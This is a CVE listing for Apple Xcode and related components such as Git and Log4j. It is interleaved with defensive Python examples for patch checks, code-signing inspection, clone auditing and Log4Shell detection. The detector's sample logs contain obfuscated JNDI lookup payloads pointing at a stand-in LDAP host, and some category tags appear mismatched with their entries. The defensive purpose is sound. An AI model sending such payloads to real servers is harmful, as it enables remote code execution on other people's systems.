Apple Xcode
Recent Apple Xcode Security Advisories
Advisory | Title | Published |
---|---|---|
121239 | Xcode 16 - Apple Support Security Content | September 16, 2024 |
HT214092 | Xcode 15.3 Security Content | March 5, 2024 |
HT213939 | Xcode 15 Security Content | September 18, 2023 |
HT213883 | Xcode 14.0 Security Content | May 23, 2023 |
HT213679 | Xcode 14.3 Security Content | March 30, 2023 |
HT213496 | Xcode 14.1 Security Content | November 1, 2022 |
HT213261 | Xcode 13.4 Security Content | May 16, 2022 |
HT213189 | Xcode 13.3 Security Content | March 14, 2022 |
HT212818 | Xcode 13 Security Content | September 20, 2021 |
HT212320 | Xcode 12.5 Security Content | April 26, 2021 |
By the Year
In 2025 there have been 0 vulnerabilities in Apple Xcode so far. In 2024 Xcode had 6 security vulnerabilities published. At this rate, Xcode is on track to have fewer security vulnerabilities in 2025 than it did last year.
Year | Vulnerabilities | Average Score |
---|---|---|
2025 | 0 | 0.00 |
2024 | 6 | 6.77 |
2023 | 7 | 6.71 |
2022 | 13 | 7.70 |
2021 | 2 | 7.75 |
2020 | 3 | 7.63 |
2019 | 10 | 8.40 |
2018 | 4 | 7.73 |
It may take a day or so for new Xcode vulnerabilities to show up in the stats or in the list of recent security vulnerabilities. Additionally, vulnerabilities may be tagged under a different product or component name.
Recent Apple Xcode Security Vulnerabilities
This issue was addressed with improved permissions checking
CVE-2024-44228
7.5 - High
- October 28, 2024
This issue was addressed with improved permissions checking. This issue is fixed in Xcode 16. An app may be able to inherit Xcode permissions and access user data.
A privacy issue was addressed by removing sensitive data
CVE-2024-40862
5.3 - Medium
- September 17, 2024
A privacy issue was addressed by removing sensitive data. This issue is fixed in Xcode 16. An attacker may be able to determine the Apple ID of the owner of the computer.
This issue was addressed by enabling hardened runtime
CVE-2024-44162
7.8 - High
- September 17, 2024
This issue was addressed by enabling hardened runtime. This issue is fixed in Xcode 16. A malicious application may gain access to a user's Keychain items.
This issue was addressed through improved state management
CVE-2024-44191
5.5 - Medium
- September 17, 2024
This issue was addressed through improved state management. This issue is fixed in iOS 17.7 and iPadOS 17.7, Xcode 16, visionOS 2, watchOS 11, macOS Sequoia 15, iOS 18 and iPadOS 18, tvOS 18. An app may gain unauthorized access to Bluetooth.
Git is a revision control system
CVE-2024-32002
9 - Critical
- May 14, 2024
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.
insecure temporary file
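The fixed-version lists quoted in this advisory (and in the CVE-2022-39260, CVE-2022-39253 and CVE-2022-29187 entries further down this page) are what a practitioner compares a `git --version` string against. The Python below is an added example, not part of this listing or of the Git project: it maps those lists onto the version string, including the `(Apple Git-NNN)` suffix that the git bundled with the Xcode Command Line Tools reports. The October 2022 lists are extended with 2.38.1, which shipped the same day as the backports the advisory names; without it a 2.38.0 install would wrongly pass as "newer than any fix". The sample version strings are constructed.

```python
import re
import subprocess

# Fixed versions as stated in the Git advisories on this page. 2.38.1 is added to the
# October 2022 entries: it was cut from the then-current line on the same day as the
# backports, and without it 2.38.0 would wrongly pass as "newer than every fix".
FIXED_VERSIONS = {
    "CVE-2024-32002": ["2.45.1", "2.44.1", "2.43.4", "2.42.2", "2.41.1", "2.40.2", "2.39.4"],
    "CVE-2022-39260": ["2.38.1", "2.37.4", "2.36.3", "2.35.5", "2.34.5", "2.33.5", "2.32.4", "2.31.5", "2.30.6"],
    "CVE-2022-39253": ["2.38.1", "2.37.4", "2.36.3", "2.35.5", "2.34.5", "2.33.5", "2.32.4", "2.31.5", "2.30.6"],
    "CVE-2022-29187": ["2.37.1", "2.36.2", "2.35.4", "2.34.4", "2.33.4", "2.32.3", "2.31.4", "2.30.5"],
}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) from a `git --version` line.

    Works for upstream output ('git version 2.45.1') and for the build Xcode ships
    ('git version 2.39.5 (Apple Git-154)'); the Apple suffix is ignored.
    """
    m = _VERSION_RE.search(text)
    if m is None:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(x) for x in m.groups())


def is_patched(version_text, cve):
    """True if the given git version carries the fix for `cve`.

    Within a maintenance line (same major.minor) the patch number decides. A line
    that received no backport is either newer than every fixed release (cut after
    the fix landed, so patched) or older than the oldest one (unmaintained, so not).
    """
    v = parse_version(version_text)
    fixed = sorted(parse_version(s) for s in FIXED_VERSIONS[cve])
    same_line = [f for f in fixed if f[:2] == v[:2]]
    if same_line:
        return v >= same_line[0]
    return v > fixed[-1]


def unpatched_cves(version_text):
    """CVEs from the table for which the given version carries no fix."""
    return [cve for cve in FIXED_VERSIONS if not is_patched(version_text, cve)]


if __name__ == "__main__":
    # Checks the git on PATH; on a Mac with the Command Line Tools that is Apple's build.
    out = subprocess.run(["git", "--version"], capture_output=True, text=True, check=True).stdout
    missing = unpatched_cves(out)
    print(out.strip(), "->", "patched against all listed CVEs" if not missing else f"missing fixes: {missing}")
```

Treat the result as a floor on a Mac: Apple sometimes ships a fix inside an Xcode release without moving to the upstream patch number, so the Xcode security content note is the authority there. Running the script against a version that is the last one in your line before the advisory date reports exactly the CVE names that the next upgrade closes.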
A logic issue was addressed with improved state management.
CVE-2024-23298
5.5 - Medium
- March 15, 2024
A logic issue was addressed with improved state management.
The issue was addressed with improved memory handling
CVE-2023-40391
5.5 - Medium
- September 27, 2023
The issue was addressed with improved memory handling. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, macOS Sonoma 14, Xcode 15. An app may be able to disclose kernel memory.
This issue was addressed by enabling hardened runtime
CVE-2023-40435
5.5 - Medium
- September 27, 2023
This issue was addressed by enabling hardened runtime. This issue is fixed in Xcode 15. An app may be able to access App Store credentials.
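Two of the Xcode fixes on this page (this one and CVE-2024-44162 above) consist of enabling the hardened runtime on a helper binary. The hardened runtime blocks code injection into the process: dyld environment variables are ignored, only libraries with a matching signature load, and debugger attachment is refused unless an entitlement permits it, so another app can no longer ride the helper's Keychain or credential access. Whether a shipped binary actually carries the flag is visible in the `flags=` field of the `CodeDirectory` line that `codesign -dvv` prints. The Python below is an added example, not Apple's code or part of this listing; it parses that field using the bit values from Apple's `cs_blobs.h`. The two sample reports are constructed in the shape codesign prints, not captured from an Xcode build.

```python
import re
import subprocess

# CodeDirectory flag bits as defined in Apple's cs_blobs.h; codesign prints the word as
# "flags=0x<hex>(<names>)" on the CodeDirectory line of `codesign -dvv`.
CS_FLAG_NAMES = {
    0x2: "adhoc",
    0x100: "hard",
    0x200: "kill",
    0x800: "restrict",
    0x1000: "enforcement",
    0x2000: "library-validation",
    0x10000: "runtime",            # CS_RUNTIME: the hardened runtime
    0x20000: "linker-signed",
}
CS_RUNTIME = 0x10000

_FLAGS_RE = re.compile(r"^CodeDirectory .*?flags=0x([0-9a-fA-F]+)", re.M)


def code_directory_flags(codesign_output):
    """Flags word from a `codesign -dvv` report.

    Raises instead of returning 0 when no CodeDirectory line exists (an unsigned
    binary, or the wrong command's output), so "not hardened" is never reported by accident.
    """
    m = _FLAGS_RE.search(codesign_output)
    if m is None:
        raise ValueError("no CodeDirectory flags found; is the binary signed?")
    return int(m.group(1), 16)


def flag_names(flags):
    """Human-readable names of the set bits, lowest bit first."""
    return [name for bit, name in sorted(CS_FLAG_NAMES.items()) if flags & bit]


def has_hardened_runtime(codesign_output):
    return bool(code_directory_flags(codesign_output) & CS_RUNTIME)


def inspect_binary(path):
    """macOS only: run codesign on a real file. codesign writes its report to stderr."""
    proc = subprocess.run(["codesign", "-dvv", path], capture_output=True, text=True, check=True)
    flags = code_directory_flags(proc.stderr + proc.stdout)
    return {"hardened_runtime": bool(flags & CS_RUNTIME), "flags": flag_names(flags)}


# Constructed reports in the shape codesign prints; the paths and identifiers are made up.
SAMPLE_HARDENED = """Executable=/Applications/Example.app/Contents/MacOS/Example
Identifier=com.example.Example
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Signature size=9000
"""

SAMPLE_LEGACY = """Executable=/Applications/Legacy.app/Contents/MacOS/Legacy
Identifier=com.example.Legacy
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=1234 flags=0x0(none) hashes=30+7 location=embedded
Signature size=9000
"""
```

`inspect_binary` is the call to make against each helper under `Xcode.app/Contents` after an upgrade that claims to have enabled the hardened runtime; the constructed samples exercise the parser offline.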
This issue was addressed with improved checks
CVE-2023-32396
7.8 - High
- September 27, 2023
This issue was addressed with improved checks. This issue is fixed in Xcode 15, tvOS 17, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to gain elevated privileges.
The issue was addressed with improved checks
CVE-2022-32920
5.5 - Medium
- September 06, 2023
The issue was addressed with improved checks. This issue is fixed in Xcode 14.0. Parsing a file may lead to disclosure of user information.
This issue was addressed with improved entitlements
CVE-2023-27945
6.3 - Medium
- May 08, 2023
This issue was addressed with improved entitlements. This issue is fixed in Xcode 14.3, macOS Big Sur 11.7.7, macOS Monterey 12.6.6. A sandboxed app may be able to collect system logs.
The issue was addressed with improved memory handling
CVE-2023-27967
8.6 - High
- May 08, 2023
The issue was addressed with improved memory handling. This issue is fixed in Xcode 14.3. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.
An injection issue was addressed with improved input validation
CVE-2022-42797
7.8 - High
- February 27, 2023
An injection issue was addressed with improved input validation. This issue is fixed in Xcode 14.1. An app may be able to gain root privileges.
Injection
Git is an open source, scalable, distributed revision control system
CVE-2022-39260
8.8 - High
- October 19, 2022
Git is an open source, scalable, distributed revision control system. `git shell` is a restricted login shell that can be used to implement Git's push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the command arguments into an array improperly uses an `int` to represent the number of entries in the array, allowing a malicious actor to intentionally overflow the return value, leading to arbitrary heap writes. Because the resulting array is then passed to `execv()`, it is possible to leverage this attack to gain remote code execution on a victim machine. Note that a victim must first allow access to `git shell` as a login shell in order to be vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to upgrade to the latest version. Disabling `git shell` access via remote logins is a viable short-term workaround.
Memory Corruption
Git is an open source, scalable, distributed revision control system
CVE-2022-39253
5.5 - Medium
- October 19, 2022
Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `--recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `--local` optimization when on a shared machine, either by passing the `--no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `--recurse-submodules` or run `git config --global protocol.file.allow user`.
insecure temporary file
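Both this advisory and CVE-2024-32002 above describe a clone leaving something in the `.git` directory that Git itself never creates: a hook file (CVE-2024-32002 writes one into `.git/` so that it runs while the clone is still in progress) or a symbolic link under `objects/` (CVE-2022-39253 copies it during a local clone). The post-clone audit below is an added example in Python, not taken from the Git project or from this listing: it walks the `.git` directory and every submodule git dir under `.git/modules` and reports both kinds of artifact. `demo()` builds a constructed layout in a temporary directory; the repository name, hook names and file contents in it are made up.

```python
import os
import tempfile
from pathlib import Path


def resolve_git_dir(repo):
    """Locate the git dir of a checkout. `.git` is normally a directory, but a
    submodule checkout or linked worktree has a `.git` file holding 'gitdir: <path>'."""
    dotgit = Path(repo) / ".git"
    if dotgit.is_file():
        line = dotgit.read_text().strip()
        if line.startswith("gitdir:"):
            return (dotgit.parent / line[len("gitdir:"):].strip()).resolve()
    return dotgit


def iter_git_dirs(git_dir):
    """Yield the top-level git dir and every submodule git dir stored under .git/modules
    (nested submodules live at .git/modules/<a>/modules/<b>)."""
    git_dir = Path(git_dir)
    yield git_dir
    modules = git_dir / "modules"
    if not modules.is_dir():
        return
    for root, dirs, files in os.walk(modules):
        if "HEAD" in files and "objects" in dirs:
            yield Path(root)
            dirs[:] = [d for d in dirs if d == "modules"]  # only descend into nested modules


def real_hooks(git_dir):
    """Hook files other than the `*.sample` templates `git init`/`git clone` install.
    A fresh clone has no real hooks, so any found right after cloning came from the clone."""
    hooks = Path(git_dir) / "hooks"
    if not hooks.is_dir():
        return []
    return sorted(p for p in hooks.iterdir() if p.is_file() and not p.name.endswith(".sample"))


def object_symlinks(git_dir):
    """Symbolic links anywhere under objects/. Git never creates these itself."""
    found = []
    # os.walk defaults to followlinks=False, so a linked directory is listed but never entered
    for root, dirs, files in os.walk(Path(git_dir) / "objects"):
        for name in dirs + files:
            p = Path(root) / name
            if p.is_symlink():
                found.append(p)
    return sorted(found)


def audit_repo(repo):
    """Return {'hooks': [...], 'object_symlinks': [...]} over the checkout and its submodules."""
    findings = {"hooks": [], "object_symlinks": []}
    for gd in iter_git_dirs(resolve_git_dir(repo)):
        findings["hooks"] += real_hooks(gd)
        findings["object_symlinks"] += object_symlinks(gd)
    return findings


def demo():
    """Audit a constructed clone layout (made up for this example) in a temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp) / "clone"
        gd = repo / ".git"
        for d in (gd / "hooks", gd / "objects" / "ab",
                  gd / "modules" / "vendor" / "hooks", gd / "modules" / "vendor" / "objects"):
            d.mkdir(parents=True)
        (gd / "HEAD").write_text("ref: refs/heads/main\n")
        (gd / "modules" / "vendor" / "HEAD").write_text("ref: refs/heads/main\n")
        (gd / "hooks" / "pre-commit.sample").write_text("#!/bin/sh\n")   # template: benign
        (gd / "hooks" / "post-checkout").write_text("#!/bin/sh\n")       # real hook: suspicious after a clone
        (gd / "modules" / "vendor" / "hooks" / "post-checkout").write_text("#!/bin/sh\n")
        (gd / "objects" / "ab" / "cdef0123").write_bytes(b"\x00")       # ordinary loose object
        secret = Path(tmp) / "secret.txt"                               # stands in for sensitive data
        secret.write_text("not for the attacker\n")
        os.symlink(secret, gd / "objects" / "leak")                     # a link Git would never create
        found = audit_repo(repo)
        return {k: sorted(str(p.relative_to(repo)) for p in v) for k, v in found.items()}
```

Run `audit_repo` on the checkout directory immediately after `git clone --recurse-submodules` of anything you do not fully trust; an empty result is what a healthy clone produces.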
Git is a distributed revision control system
CVE-2022-29187
7.8 - High
- July 12, 2022
Git is a distributed revision control system. Git prior to versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5 is vulnerable to privilege escalation on all platforms. An unsuspecting user could still be affected by the issue reported in CVE-2022-24765, for example when navigating as root into a shared tmp directory that is owned by them, but where an attacker could create a git repository. Versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5 contain a patch for this issue. The simplest way to avoid being affected by the exploit described in the example is to avoid running git as root (or an Administrator on Windows), and if needed to reduce its use to a minimum. While a generic workaround is not possible, a system could be hardened against the exploit described in the example by removing any such repository if it exists already and creating one as root to block any future attacks.
DLL preloading
This issue was addressed with improved checks
CVE-2022-26747
7.8 - High
- May 26, 2022
This issue was addressed with improved checks. This issue is fixed in Xcode 13.4. An app may be able to gain elevated privileges.
Git for Windows is a fork of Git containing Windows-specific patches
CVE-2022-24765
7.8 - High
- April 12, 2022
Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machines, where untrusted parties have write access to the same hard disk. Those untrusted parties could create the folder `C:\.git`, which would be picked up by Git operations run supposedly outside a repository while searching for a Git directory. Git would then respect any config in said Git directory. Git Bash users who set `GIT_PS1_SHOWDIRTYSTATE` are vulnerable as well. Users who installed posh-git are vulnerable simply by starting a PowerShell. Users of IDEs such as Visual Studio are vulnerable: simply creating a new project would already read and respect the config specified in `C:\.git\config`. Users of the Microsoft fork of Git are vulnerable simply by starting a Git Bash. The problem has been patched in Git for Windows v2.35.2. Users unable to upgrade may create the folder `.git` on all drives where Git commands are run, and remove read/write access from those folders as a workaround. Alternatively, define or extend `GIT_CEILING_DIRECTORIES` to cover the _parent_ directory of the user profile, e.g. `C:\Users` if the user profile is located in `C:\Users\my-user-name`.
DLL preloading
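The discovery walk that this advisory and CVE-2022-29187 above depend on, reproduced as an added Python model (not Git's code and not part of this listing): starting from the working directory, Git checks for `.git` in each ancestor in turn, so a `.git` planted at a shared ancestor such as `C:\` or a shared tmp directory is found by every command run below it. `GIT_CEILING_DIRECTORIES` names directories the walk must not climb into, which is why the advisory suggests covering the parent of the user profile. The upstream fix (Git for Windows 2.35.2 and the versions named under CVE-2022-29187) additionally refuses a repository directory owned by a different user unless it is listed in `safe.directory`. The example implements both rules and exercises them against a constructed layout in a temporary directory; it is POSIX-only because it compares numeric owner uids, and the uid mismatch case is shown by passing a different uid rather than by changing ownership.

```python
import os
import tempfile
from pathlib import Path


def discover_git_dir(start, ceilings=()):
    """Walk upward from `start` until a `.git` entry is found, as Git's discovery does.

    `ceilings` follows GIT_CEILING_DIRECTORIES: the walk never moves *into* a listed
    directory, though `start` itself is always examined. (Git also stops at filesystem
    boundaries unless GIT_DISCOVERY_ACROSS_FILESYSTEM is set; that rule is omitted here.)
    """
    cur = Path(start).resolve()
    ceiling_set = {Path(c).resolve() for c in ceilings}
    while True:
        candidate = cur / ".git"
        if candidate.exists():
            return candidate
        parent = cur.parent
        if parent == cur or parent in ceiling_set:
            return None
        cur = parent


def is_owned_by_user(path, uid=None):
    """The ownership rule patched Git applies before trusting a discovered repository.
    `uid` defaults to the calling user; it is a parameter so the mismatch case can be shown."""
    if uid is None:
        uid = os.getuid()
    return os.stat(path, follow_symlinks=False).st_uid == uid


def safe_discover(start, ceilings=(), uid=None):
    """Return (git_dir, verdict). Patched Git honours the repository's config only on 'ok'."""
    gd = discover_git_dir(start, ceilings)
    if gd is None:
        return None, "no repository"
    if not is_owned_by_user(gd, uid):
        return gd, "refused: owned by another user"
    return gd, "ok"


def demo():
    """Plant a `.git` at a shared ancestor (constructed in a temp dir) and run 'git' below it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp).resolve()
        planted = root / ".git"                  # the attacker's directory from the advisory
        planted.mkdir()
        (planted / "config").write_text("[core]\n\trepositoryformatversion = 0\n")
        work = root / "Users" / "me" / "proj"    # where the victim runs git, three levels down
        work.mkdir(parents=True)
        me = os.getuid()
        return {
            # unpatched behaviour: the planted directory is found and, same owner here, trusted
            "unprotected": safe_discover(work)[1],
            # GIT_CEILING_DIRECTORIES covering the profile's parent stops the walk first
            "with_ceiling": safe_discover(work, ceilings=[root / "Users"])[1],
            # patched Git: the directory belongs to someone else, so it is refused
            "other_owner": safe_discover(work, uid=me + 1)[1],
            "found": str(discover_git_dir(work).relative_to(root)),
        }
```

The `unprotected` result is the pre-fix behaviour the advisory describes; on a real multi-user host the planted directory would belong to the attacker, which is the `other_owner` branch.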
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22604
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22601
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22602
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22603
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22605
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22607
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22608
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22606
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2
CVE-2021-44228
10 - Critical
- December 10, 2021
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Improper Input Validation
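Log4Shell is a detection problem as much as a patching one: the advisory above says the trigger is a `${jndi:...}` lookup in any logged string, and in practice probes hide it behind nested lookups that Log4j resolves before it ever sees `jndi` (`${lower:j}`, `${upper:J}` and the `${name:-j}` default-value form, of which `${::-j}` is the shortest). The Python below is an added detection example, not from this listing or from Apache: it unwinds those forms the way Log4j does and then looks for the lookup. The five access-log lines are constructed, with documentation-range addresses.

```python
import re

_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalise_lookups(s, max_rounds=20):
    """Resolve the lookup forms used to hide `${jndi:`.

    `${lower:X}` / `${upper:X}` become X (the final search is case-insensitive anyway)
    and `${name:-X}` becomes its default X, which covers `${::-j}` and `${env:NOPE:-j}`.
    Only innermost lookups (no `$` or braces inside) match, so repeating the pass
    unwinds nesting from the inside out until nothing changes.
    """
    for _ in range(max_rounds):
        new = _DEFAULT.sub(lambda m: m.group(1), _LOWER_UPPER.sub(lambda m: m.group(1), s))
        if new == s:
            return s
        s = new
    return s


def is_jndi_probe(line):
    return _JNDI.search(normalise_lookups(line)) is not None


def scan(lines):
    """Indices of the lines carrying a JNDI lookup, obfuscated or not."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]


# Constructed access-log lines: 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 612 "-" "curl/7.68.0"',
]
```

The last line shows why the check is for `jndi` after normalisation rather than for `${` alone: other lookups are legitimate and produce noise. Feed the detector any field an application logs verbatim (User-Agent, X-Forwarded-For, form fields), since those are where the probes arrived.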
A path handling issue was addressed with improved validation
CVE-2021-1800
5.5 - Medium
- April 02, 2021
A path handling issue was addressed with improved validation. This issue is fixed in Xcode 12.4. A malicious application may be able to access arbitrary files on the host device while running an app that uses on-demand resources with Xcode.
This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7
CVE-2020-9992
7.8 - High
- October 16, 2020
This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network.
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case
CVE-2014-9390
9.8 - Critical
- February 12, 2020
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.
Improper Input Validation
NGINX before 1.17.7, with certain error_page configurations
CVE-2019-20372
5.3 - Medium
- January 09, 2020
NGINX before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where NGINX is being fronted by a load balancer.
HTTP Request Smuggling
A memory corruption issue was addressed with improved validation
CVE-2019-8800
7.8 - High
- December 18, 2019
A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution.
Buffer Overflow
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4
CVE-2019-8721
8.8 - High
- December 18, 2019
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4. This issue is fixed in Xcode 11.0. Compiling code without proper input validation could lead to arbitrary code execution with user privilege.
Improper Input Validation
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4
CVE-2019-8722
8.8 - High
- December 18, 2019
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4. This issue is fixed in Xcode 11.0. Compiling code without proper input validation could lead to arbitrary code execution with user privilege.
Improper Input Validation
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4
CVE-2019-8723
8.8 - High
- December 18, 2019
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4. This issue is fixed in Xcode 11.0. Compiling code without proper input validation could lead to arbitrary code execution with user privilege.
Improper Input Validation
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4
CVE-2019-8724
8.8 - High
- December 18, 2019
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4. This issue is fixed in Xcode 11.0. Compiling code without proper input validation could lead to arbitrary code execution with user privilege.
Improper Input Validation
A memory corruption issue was addressed with improved state management
CVE-2019-8738
7.8 - High
- December 18, 2019
A memory corruption issue was addressed with improved state management. This issue is fixed in Xcode 11.0. Processing a maliciously crafted file may lead to arbitrary code execution.
Buffer Overflow
A memory corruption issue was addressed with improved state management
CVE-2019-8739
7.8 - High
- December 18, 2019
A memory corruption issue was addressed with improved state management. This issue is fixed in Xcode 11.0. Processing a maliciously crafted file may lead to arbitrary code execution.
Buffer Overflow
A memory corruption issue was addressed with improved validation
CVE-2019-8806
7.8 - High
- December 18, 2019
A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution.
Buffer Overflow
SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2 mishandles default typing when ehcache is used (
CVE-2019-14379
9.8 - Critical
- July 29, 2019
SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2 mishandles default typing when ehcache is used (because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup), leading to remote code execution.
Prototype Pollution
A memory corruption issue was addressed with improved input validation
